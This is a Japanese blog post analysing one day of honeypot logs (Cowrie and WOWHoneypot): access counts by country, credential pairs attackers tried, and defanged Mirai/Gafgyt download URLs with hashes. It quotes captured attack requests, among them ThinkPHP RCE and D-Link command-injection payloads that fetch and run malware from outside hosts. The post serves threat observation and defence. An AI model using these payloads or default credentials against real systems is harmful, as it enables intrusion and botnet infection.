cute_otter’s blog

ハニーポットの観察日記を付けています

トップ > ハニーポット観察日記 > ハニーポット観察日記(2019/01/06) 「イタリアからのアクセス件数が過去最大」

ハニーポット観察日記(2019/01/06) 「イタリアからのアクセス件数が過去最大」

ハニーポット観察日記

はじめに

こんにちは。cute_otterです。
今日から本業が始まったので、投稿が遅くなってしまいました。(明日以降も遅れるかもしれないです)

Cowrie

ハニーポット「Cowrie」で2019/01/06 (日) 00:00~23:59 UTC(運用55日目)に取得したログの簡易分析です。

概況

  • 集計期間 : 2019/01/06 (日) 00:00~23:59 UTC
  • 総イベント件数 : 1,064,395 件 (前日比 -3,276 件)
    • コマンド実行成功 : 471,551 件 (前日比 -900 件)
    • コマンド入力 : 371,887 件 (前日比 +12,201 件)
    • ファイルダウンロード成功 : 72,523 件 (前日比 -515 件)
    • セッションクローズ : 32,414 件 (前日比 -1,002 件)
    • 新しいコネクション : 32,411 件 (前日比 -1,005 件)
    • コマンド実行失敗 : 19,781 件 (前日比 -12,004 件)
    • ログイン成功 : 13,980 件 (前日比 -747 件)
    • 外部へのTCP/IPリクエストの送出 : 10,745 件 (前日比 +1,135 件)
    • TTYログ取得終了 : 9,697 件 (前日比 -792 件)
    • Cowrieによってエミュレートされたアーキテクチャ : 9,696 件 (前日比 -793 件)
    • ファイルダウンロード失敗 : 8,097 件 (前日比 +2,598 件)
    • クライアントのSSHバージョン : 4,512 件 (前日比 +118 件)
    • SSH鍵交換 : 4,504 件 (前日比 +127 件)
    • 外部へのTCP/IPデータの送出 : 2,107 件 (前日比 +183 件)
    • ログイン失敗 : 478 件 (前日比 -1,890 件)
    • クライアントの環境設定 : 8 件 (前日比 +-0 件)
    • ターミナルサイズ : 4 件 (前日比 +2 件)
  • ログイン試行件数 : 14,458 件 (前日比 -2,637 件)
  • SSHコネクション件数 : 13,164 件 (前日比 +95 件)
  • Telnetコネクション件数 : 19,247 件 (前日比 -1,100 件)
  • ユニークIPアドレス件数 : 274 件 (前日比 -196 件)
  • アクセス元の国数 : 50 カ国 (前日比 -2 カ国)
  • TTY件数 : 9,697 件 (前日比 -792 件)

特徴

  • 総イベント件数が減少
    • 前日(2019/01/05)より3,200件ほど減少
    • 総イベント件数は減少したが、コマンド入力は前日(2019/01/05)より12,000件ほど増加
  • ログイン試行件数の減少
    • 前日(2019/01/05)より2,600件ほど減少
  • Telnetコネクション件数の減少
    • 前日(2019/01/05)より1,000件ほど減少
  • ユニークIPアドレス件数の減少
    • 前日(2019/01/05)より200件ほど減少
  • イタリアからのアクセス件数が大幅に増加
    • 前日(2019/01/05)より28万件ほど増加
    • 過去最大のアクセス件数となりました。

ダッシュボード

ダッシュボードは以下の通りです。

2019/01/06のダッシュボード
2019/01/06のダッシュボード

国別のアクセス件数

国別のアクセス件数の変遷(2019/01/06)は以下の通りです。

国別のアクセス件数の変遷(2019/01/06)
国別のアクセス件数の変遷(2019/01/06)

続いて、国別のアクセス件数(上位20位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. Italy 525,601 2. 242,216 +283,385 -
2. United States 483,630 1. 547,428 -63,798 -
3. United Kingdom 19,032 3. 48,606 -29,574 -
4. Ireland 15,488 8. 15,121 +367 -
5. Latvia 5,144 13. 3,400 +1,744 -
6. Singapore 4,333 12. 4,507 -174 -
7. Germany 4,014 21. 1,541 +2,473 -
8. Romania 1,488 28. 528 +960 -
9. Russia 1,474 5. 37,078 -35,604 -
10. Netherlands 733 20. 1,546 -813 -
11. Canada 654 17. 2,466 -1,812 -
12. China 582 4. 44,427 -43,845 -
13. Vietnam 381 15. 2,574 -2,193 -
14. Brazil 305 26. 610 -305 -
15. Spain 284 11. 9,736 -9,452 -
16. Sweden 248 36. 151 +97 -
17. Republic of Korea 191 7. 25,096 -24,905 -
18. France 130 14. 3,011 -2,881 -
19. Turkey 120 23. 854 -734 -
20. India 60 19. 2,266 -2,206 -
  • 前日(2019/01/05)は14時~15時の期間にアクセスが集中していましたが、今日は0時~15時の期間に、継続的に4~6万件のアクセスがありました。16時以降は4万件を超えることはありませんでした。
  • イタリアからのアクセス件数が前日(2019/01/05)の242,216件から28万件ほど増加し、525,601件となりました。
    • 0時~16時にアクセスが集中していました。
    • 過去最大のアクセス件数となりました。
  • アメリカからのアクセス件数が前日(2019/01/05)の547,428件から6万件ほど減少し、483,630件となりました。
  • 前日(2019/01/05)は、普段アクセス件数が少ないイスラエル韓国キプロスアゼルバイジャンスペインからのアクセス件数が大幅に増加しましたが、今日は大幅に減少しました。
  • また、前日(2019/01/05)に、普段から一定のアクセス件数があるイギリス中国ロシアからのアクセス件数が増加しましたが、今日は大幅に減少しました。
イタリアからのアクセス件数の変遷

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/06)は以下の通りです。

イタリアからのアクセス件数の変遷(2018/12/24~2019/01/06)
イタリアからのアクセス件数の変遷(2018/12/24~2019/01/06)

2018/12/26から件数が増加し始め、2018/12/28に、一時的に件数が減少しました。
しかし、2018/12/29から再び件数が増加し始め、2018/12/30~2019/01/01にかけてピークを迎え、毎日30万件以上のアクセスがありました。
2019/01/02には件数が大幅に減少し、430件となりましたが、2019/01/03から再び増加し始め、2019/01/04には327,194件となりました。
2019/01/05は8万件ほど減少して242,216件となりましたが、2019/01/06には525,601件となり、過去最大となりました。

イベント件数

イベント件数の変遷(2019/01/06)は以下の通りです。

イベント件数の変遷(2019/01/06)
イベント件数の変遷(2019/01/06)

各イベント件数の変遷(2019/01/06)
各イベント件数の変遷(2019/01/06)

  • 5時と15時にイベント件数が増加しました。
  • 16時以降は徐々にイベント件数が減少しました。

国別のログイン試行

国別のログイン試行の件数(上位10位)は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. Italy 4,826 3. 2,262 +2,564 -
2. United States 4,373 1. 5,334 -961 -
3. United Kingdom 2,274 2. 2,475 -201 -
4. Ireland 1,930 4. 1,914 +16 -
5. Canada 317 9. 353 -36 -
6. Russia 164 6. 723 -559 -
7. Latvia 111 19. 73 +38 -
8. Singapore 98 17. 104 -6 -
9. China 70 5. 768 -698 -
10. Germany 61 20. 47 +14 -
  • イタリアからのログイン試行件数が前日(2019/01/05)より2,500件ほど増加し、4,826件となりました
  • アメリカからのログイン試行件数が前日(2019/01/05)より960件ほど減少し、4,373件となりました。
  • 前日(2019/01/05)にログイン試行件数が増加していたイギリスロシア中国の件数が減少しました。

ログイン試行で使用されたユーザ名とパスワード

ログイン試行の際に使用されたユーザ名とパスワードの組み合わせ(上位20位)は以下の通りです。

順位 ユーザ名 パスワード 件数 前日の順位 前日の件数 件数差 備考
1. admin admin 4,365 1. 4,282 +83 -
2. root 88888888 1,702 2. 864 +838 -
3. guest 123456 862 4. 441 +421 -
4. root GM8182 861 3. 443 +418 Grain Media製のDVRを狙ったものと思われる(参照)
5. support 1234 849 5. 424 +425 -
6. admin admin1 848 6. 424 +424 -
7. root (空欄) 312 7. 325 -13 -
8. root vizxv 279 8. 289 -10 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
9. root 666666 255 10. 270 -15 Zhejiang Dahua Technology製のカメラを狙ったものと思われる(参照)
10. user user 244 9. 279 -35 -
11. root 888888 238 13. 210 +28 Zhejiang Dahua Technology製のDVRを狙ったものと思われる(参照)
12. root pass 204 11. 235 -31 -
13. root 123456 191 12. 222 -31 -
14. support support 170 16. 178 -8 -
15. root 12345 168 15. 189 -21 -
16. root system 159 19. 169 -10 -
17. root default 155 14. 200 -45 -
18. root xc3511 154 17. 175 -21 Xiongmai製のDVRを狙ったものと思われる(参照)
19. root hi3518 149 18. 173 -24 HiSilicon Technologies製のIPカメラを狙ったものと思われる(参照)
20. admin 4321 144 20. 161 -17 -
  • admin/adminの組み合わせのほとんどがイギリスアイルランドからのログイン試行の際に使用されていました。
    • イギリスが2,214件(4,365件中)、アイルランドが1,927件(4,365件中)でした。
  • root/88888888root/GM8182guest/123456support/1234admin/admin1の組み合わせのほとんどがイタリアからのログイン試行の際に使用されていました。
    • root/88888888は1,595件(1,702件中)でした。
    • guest/123456は806件(862件中)でした。
    • root/GM8182は803件(861件中)でした。
    • support/1234は796件(849件中)でした。
    • admin/admin1は796件(848件中)でした。

ダウンロードされたファイル

ダウンロードされたファイルは以下の通りです。

※VT : VirusTotal

順位 ダウンロード元 MD5 検出率(VT) 件数 備考
1. hxxp://195[.]231[.]0[.]185:80/AB4g5/Josho[.]x86 aa496313be71695fda7e415999233aa9 19/55 4,641 Mirai
2. hxxp://198[.]98[.]62[.]237:80/bins/mirai[.]x86 4147e375f325878fe3c3962c3d4ac411 37/57 2,580 Mirai
3. hxxp://206[.]189[.]188[.]228:80/bins/hoho[.]x86 2d46b69ac12c590f01eb65d7b987f365 20/59 131 Mirai
4. hxxp://167[.]99[.]229[.]112:80/8x868 a65849fe667dcc5eadd920d427785642 21/57 120 Gafgyt
5. hxxp://167[.]99[.]224[.]50:80/AB4g5/Josho[.]x86 a5381334416e082e697ee2b1ea07927b 17/56 102 Mirai
6. hxxp://46[.]183[.]218[.]243:80/33bi/Ares[.]x86 e68bd8a8712ce1788faa15c9813c00ab 20/60 98 Mirai
7. hxxp://178[.]128[.]214[.]44:80/Kuso69/Akiru[.]x86 0f6fa2e22d9de3864e7d60ed6c0cb4b5 34/60 93 Mirai
8. hxxp://209[.]141[.]43[.]15:80/bins/x86 6eb899d1b251aff0518c4212a3340d01 21/56 89 Mirai
9. hxxp://209[.]141[.]43[.]15:80/bins/x86 d3f0f38a282c261ea2fea7068b9615e4 27/58 82 Mirai
10. hxxp://193[.]148[.]69[.]33:80/bins/apep[.]x86 5f907e801696ad157f15421de5691733 19/59 21 Mirai
11. hxxp://bot[.]sunless[.]network:80/sunless[.]x86 a1959a7398028269218eaca678685a32 10/57 18 Mirai
12. hxxp://209[.]97[.]185[.]168:80/bins/kirai[.]x86 3906a2f9b3192664762e3f6eb84f4c18 22/58 17 Mirai
13. hxxp://209[.]141[.]57[.]94/bins[.]sh b05e61bc07d161f9fdda1fa8cb744514 21/57 12 -|Mirai(ダウンローダー?)
14. hxxp://206[.]189[.]188[.]228:80/AB4g5/Josho[.]x86 b3cacdc6b5bb4b4fd74d49b0fbfa575b 20/59 11 Mirai
15. hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 eb50a4263374adffbe9ee66c19c3473c 9/59 11 Mirai or Gafgyt
16. hxxp://167[.]99[.]219[.]142:80/bins/dark[.]x86 c81e2c6cae869a1c5b59d0fda16f4794 19/59 9 Mirai
17. hxxp://193[.]148[.]69[.]33:80/bins/telnet[.]x86 f81cb52b13c0ad74247db720ffe5fa36 15/59 8 Mirai
18. hxxp://139[.]59[.]25[.]145:80/bins/sora[.]x86 e4ae3f23bbdbcb67b52be4616ffe280b 21/57 7 Mirai
19. hxxp://185[.]244[.]25[.]174:80/bins/hoho[.]x86 a40b8c790d6db3262ec9ab308caf62eb 24/59 6 Mirai
20. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 76eb95ff74919eb2e06c9a0273882686 9/59 6 Mirai
21. hxxp://199[.]38[.]243[.]9:80/33bi/mirai[.]x86 564e572d77a86ab7161b4b67b7f81981 24/58 6 Mirai
22. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 b87c872eb23378b590f910314d0854de 10/58 5 Mirai
23. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 4ead648aad002e6b4d8bd8da75d4ea77 10/57 4 Mirai
24. hxxp://194[.]36[.]173[.]4:80/vi/x86[.]bushido 236cc078eb84e9e14f1112a52e74abc9 36/59 3 Mirai
25. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 a45021797efbfa00dd8eff40e9302ddb 10/56 2 Mirai
26. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 3d373504fea89e079131c31890e1167a 10/58 2 Mirai
27. hxxp://185[.]248[.]140[.]102:80/bins/clean[.]x86 fc502020959a5cd8b2375e1a80623e0c 10/58 2 Mirai
28. hxxp://167[.]99[.]11[.]34:80/bins/hoho[.]x86 1b4928722d29fe8ac656d541585ba9e6 20/59 2 Mirai
29. hxxp://193[.]148[.]69[.]33:80/bins/apep[.]x86 04159fd26a377aa7bb01c5450be95fd8 16/59 1 Mirai
30. hxxp://185[.]244[.]25[.]241/usviibins[.]sh e59a19358a1df1e97ccf58f2740f1e4c 26/57 1 Mirai(ダウンローダー?)
31. hxxp://217[.]61[.]105[.]126:80/shiro[.]x86 bfaf3d11d11b645c9a2002354248a024 20/58 1 Mirai
32. hxxp://185[.]133[.]193[.]118:80/bins/penthouse[.]x86 2eb8510c97761cdc6be9913297356815 15/57 1 Mirai
  • Mirai(亜種含む)やGafgyt(亜種含む)と思われるマルウェアがダウンロードされていました。

外部へのTCP/IPデータの送出

SSHでログインした直後に、以下のデータを1秒ごとに20回ほど繰り返して送信した後、ログアウトしていました。
SSHにログインする際のユーザ名とパスワードの組み合わせはadmin/abc123!@)でした。

GET /test.php HTTP/1.1\r\nUser-Agent: curl/7.35.0\r\nHost: 167[.]114[.]159[.]146\r\nAccept: */*\r\n\r\n

侵入に成功したサーバーを踏み台として利用して、WebShellの探査を行っているのでしょうか?
詳しい方がいらっしゃいましたらご教授ください...

Cowrieで取得したログの簡易分析は以上です。

WOWHoneypot

続いて、ハニーポット「WOWHoneypot」で2019/01/06 (日) 00:00~23:59 UTC(運用3日目)に取得したログの簡易分析です。

概況

  • 集計期間 : 2019/01/06 (日) 00:00~23:59 UTC
  • 総アクセス件数 : 217 件 (前日比 -841 件)
  • ユニークIPアドレス件数 : 30 件 (前日比 +7 件)
  • アクセス元の国数 : 17 カ国 (前日比 -1 件)

特徴

  • 総アクセス件数が減少
    • 前日(2019/01/05)より841件ほど減少

国別のアクセス件数

国別のアクセス件数は以下の通りです。

順位 国名 件数 前日の順位 前日の件数 件数差 備考
1. China 187 1. 458 -271 -
2. Brazil 9 5. 3 +4 -
3. United States 6 4. 6 +-0 -
4. Indonesia 2 6. 2 +-0 -
5. Greece 1 - 0 +1 -
6. Georgia 1 - 0 +1 -
7. Turkey 1 - 0 +1 -
8. Russia 1 12. 1 +-0 -
9. India 1 10. 1 +-0 -
10. Czechia 1 - 0 +1 -
11. Ukraine 1 - 0 +1 -
12. Thailand 1 3. 228 -227 -
13. Bangladesh 1 - 0 +1 -
14. Canada 1 - 0 +1 -
15. Poland 1 - 0 +1 -
16. Sweden 1 - 0 +1 -
17. Colombia 1 - 0 +1 -
  • 前日(2019/01/05)にアクセス件数が多かった香港タイからの件数が大幅に減少しました。

メソッド

メソッドの件数は以下の通りです。

順位 メソッド 件数 前日の順位 前日の件数 件数差 備考
1. GET 143 1. 543 -400 -
2. POST 73 2. 511 -438 -
3. PROPFIND 1 3. 4 -3 -

HTTPバージョン

HTTPバージョンの件数は以下の通りです。

順位 HTTPバージョン 件数 前日の順位 前日の件数 件数差 備考
1. HTTP/1.1 214 1. 1057 -843 -
2. HTTP/1.0 3 2. 1 +2 -
  • HTTP/1.0/へのアクセスでした。

Tomcatの管理ページにおけるBasic認証

Tomcatの管理ページ(/manager/html)におけるBasic認証で使用されたユーザ名とパスワードの組み合わせは以下の通りです。

順位 ユーザ名 パスワード 件数 前日の順位 前日の件数 件数差 備考
1. admin (空欄) 1 1. 3 -2 -
2. admin 123456 1 3. 3 -2 -
3. admin tomcat 1 4. 3 -2 -
4. tomcat tomcat 1 6. 3 -2 -
5. tomcat 123456 1 7. 3 -2 -
6. tomcat admin 1 8. 3 -2 -
7. tomcat s3cret 1 9. 3 -2 -

アクセス先

アクセス先(上位15位+気になったもの)は以下の通りです。

順位 アクセス先 件数 前日の順位 前日の件数 件数差 備考
1. GET / HTTP/1.1 23 2. 17 +6 トップページへのアクセス
2. GET /manager/html HTTP/1.1 8 1. 30 -22 Tomcatの管理ページに対するログイン試行
3. GET / HTTP/1.0 3 316. 1 +2 トップページへのアクセス
4. GET /shell.php HTTP/1.1 2 6. 8 -6 WebShellの探査
5. GET /cmd.php HTTP/1.1 2 7. 8 -6 WebShellの探査
6. POST /xx.php HTTP/1.1 2 8. 8 -6 WebShellの探査
7. POST /conflg.php HTTP/1.1 2 9. 8 -6 WebShellの探査
8. POST /q.php HTTP/1.1 2 10. 8 -6 WebShellの探査
9. POST /qq.php HTTP/1.1 2 3. 12 -10 WebShellの探査
10. GET /admin/phpMyAdmin/index.php HTTP/1.1 2 11. 8 -6 phpMyAdminの探査
11. GET /public/index.php?s=/index/\Cthink\Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=cd%20/tmp;wget%20hxxp://185[.]244[.]25[.]174/bunny[.]x86;cat%20bunny[.]x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1 1 - 0 +1 ThinkPHPフレームワーク脆弱性(RCE)を狙った攻撃(参照)
12. GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1]=cd%20/tmp;curl%20-O%20hxxp://185[.]244[.]25[.]174/bunny[.]x86;cat%20bunny[.]x86%20%3E%20xdsf;chmod%20777%20xdsf;./xdsf%20thinkphp HTTP/1.1 1 - 0 +1 ThinkPHPフレームワーク脆弱性(RCE)を狙った攻撃(参照)
13. GET /xmlrpc.php HTTP/1.1 1 - 0 +1 WordPressXML-RPCの探査
14. GET /login.cgi?cli=aa%20aa%27;wget%20hxxp://185[.]101[.]105[.]129/kalon[.]mips%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1 1 - 0 +1 D-Link製のルーター脆弱性(OSコマンドインジェクション)を狙った攻撃と思われる
15. PROPFIND / HTTP/1.1 1 21. 4 -3 Microsoft IIS 6.0の脆弱性CVE-2017-7269を狙った攻撃
  • XML-RPCの探査を初めて観測しました。

WOWHoneypotで取得したログの簡易分析は以上です。